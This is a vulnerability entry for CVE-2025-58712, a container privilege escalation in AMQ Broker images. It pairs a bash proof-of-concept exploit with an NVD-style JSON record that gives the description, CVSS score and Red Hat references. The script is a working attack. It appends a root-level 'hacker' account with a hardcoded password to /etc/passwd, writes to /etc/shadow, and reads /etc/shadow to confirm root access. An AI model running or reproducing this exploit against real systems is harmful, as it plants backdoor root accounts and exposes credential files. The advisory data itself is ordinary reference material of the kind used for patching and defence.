CVE-2025-58712

#!/bin/bash # CVE-2025-58712 PoC - AMQ Broker Container Privilege Escalation # Requirements: Non-root user with root group membership in affected container # Step 1: Check current user and group membership echo "[+] Current user info:" id # Step 2: Verify /etc/passwd is group-writable if [ -w /etc/passwd ]; then echo "[+] /etc/passwd is group-writable - Target vulnerable!" else echo "[-] /etc/passwd is not group-writable - Target may not be vulnerable" fi # Step 3: Generate password hash for new root user PASSWORD="hacked123" SALT="aa" HASH=$(python3 -c "import crypt; print(crypt.crypt('$PASSWORD', '\$6\$$SALT'))") # Step 4: Backup original /etc/passwd cp /etc/passwd /tmp/passwd.bak # Step 5: Add new root user to /etc/passwd NEW_USER="hacker:x:0:0:root:/root:/bin/bash" echo "$NEW_USER" >> /etc/passwd # Step 6: Set password for the new root user (requires /etc/shadow or alternative) echo "hacker:$HASH:0:0:99999:0::0:" >> /etc/shadow 2>/dev/null || echo "[!] Shadow file not writable, using alternative method" # Step 7: Verify privilege escalation echo "[+] Attempting to verify root access..." su - hacker -c "whoami && id && cat /etc/shadow | head -1" echo "[+] Privilege escalation completed! New root user 'hacker' created."

{"cve": {"id": "CVE-2025-58712", "sourceIdentifier": "[email protected]", "published": "2025-10-22T19:15:34.270", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A container privilege escalation flaw was found in certain AMQ Broker images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2025:17562", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-58712", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2394418", "source": "[email protected]"}]}}